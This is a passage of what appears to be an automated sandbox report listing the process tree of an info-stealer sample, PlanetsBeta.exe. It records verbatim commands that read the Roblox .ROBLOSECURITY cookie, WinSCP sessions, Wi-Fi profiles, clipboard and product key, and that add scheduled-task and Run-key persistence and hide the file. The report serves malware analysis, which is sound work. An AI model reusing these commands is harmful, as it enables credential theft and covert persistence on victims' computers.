  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
  2⤵
  PID:9756
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5900
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get name
    3⤵
    PID:3860
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:10852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
  2⤵
  PID:9924
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:7368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
  2⤵
  PID:6988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:10804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:11092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:8460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:10792
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1888 get ExecutablePath"
  2⤵
  PID:4520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=1888 get ExecutablePath
    3⤵
    PID:4628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupp74m4f /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe\" /F /rl highest"
  2⤵
  PID:4948
- - C:\Windows\system32\cmd.exe
    cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupp74m4f /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe\" /F /rl highest
    3⤵
    PID:11056
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /sc onlogon /tn WindowsDriverSetupp74m4f /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe\" /F /rl highest
      4⤵
      Creates scheduled task(s)
      PID:856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupp74m4f /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe /f"
  2⤵
  PID:1320
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupp74m4f /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe /f
    3⤵
    PID:7656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe\"""
  2⤵
  PID:9760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe\""
    3⤵
    PID:10900
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe
      4⤵
      Views/modifies file attributes
      PID:8100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -Command "& { $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\PlanetsBeta.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask }"
  2⤵
  PID:8476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
  2⤵
  PID:10700
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:6216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
  2⤵
  PID:5348
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:9820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
  2⤵
  PID:7480
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
    3⤵
    PID:5852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
  2⤵
  PID:3624
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
    3⤵
    PID:1548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
  2⤵
  PID:8084
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
    3⤵
    PID:7260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
  2⤵
  PID:6084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
  2⤵
  PID:9924
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
    3⤵
    PID:1432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
  2⤵
  PID:5136
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
    3⤵
    PID:10260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
  2⤵
  PID:4516
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
    3⤵
    PID:6572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
  2⤵
  PID:10028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
  2⤵
  PID:6816
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
    3⤵
    PID:4708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
  2⤵
  PID:5692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -Command "& {netsh wlan show profile}"
  2⤵
  PID:8904
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    PID:6308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"
  2⤵
  PID:8984
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard
    3⤵
    PID:6608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"
  2⤵
  PID:10592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\yF9lESN0OlkQ_temp.ps1""
  2⤵
  PID:9664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""
  2⤵
  PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""
  2⤵
  PID:10452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
  2⤵
  PID:8372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
  2⤵
  PID:10636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""
  2⤵
  PID:7172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""
  2⤵
  PID:10196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
  2⤵
  PID:2032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
  2⤵
  PID:3572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
  2⤵
  PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
  2⤵
  PID:5284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""
  2⤵
  PID:8884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
  2⤵
  PID:6516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
  2⤵
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
  2⤵
  PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
  2⤵
  PID:8796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""
  2⤵
  PID:6764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
  2⤵
  PID:8940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
  2⤵
  PID:7348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""
  2⤵
  PID:6632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
  2⤵
  PID:9464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""
  2⤵
  PID:5736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
  2⤵
  PID:8840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
  2⤵
  PID:5280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
  2⤵
  PID:10056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
  2⤵
  PID:3832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
  2⤵
  PID:10232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""
  2⤵
  PID:6836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
  2⤵
  PID:9388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
  2⤵
  PID:1404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
  2⤵
  PID:9888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
  2⤵
  PID:10340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
  2⤵
  PID:6952
- C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe
  "C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3408 --field-trial-handle=1728,10780680055874431263,4156419963185918940,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  PID:11108

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2340

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7852

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7904

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8044

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8136

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8208

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8224

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8216

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8188

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8168

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
1⤵
PID:8160

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8152

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8128

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8104

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8088

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8072

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8064

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8056

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8036

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7988

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7980

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7968

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8352

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8420

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8540

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8700

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8852

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:9024

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:9016

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8936

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8928

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8880

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8844

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8828

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8820

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
1⤵
PID:9756

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8764

C:\Windows\system32\more.com
more +1
1⤵
PID:8744

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8676

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8668

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8660

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8644

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8628

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8616

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8608

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8600

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8580

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8528

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8480

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8472

C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
1⤵
PID:8460

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8344

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8300

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8292

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8280

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7944

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7936

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7928

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7920

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7896

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7844

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7812

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7796

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7780

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7764

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
1⤵
PID:8648

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
1⤵
PID:10472

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
1⤵
PID:3604

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
1⤵
PID:7576

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
1⤵
PID:5496

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
1⤵
PID:7616

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
1⤵
PID:8320

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
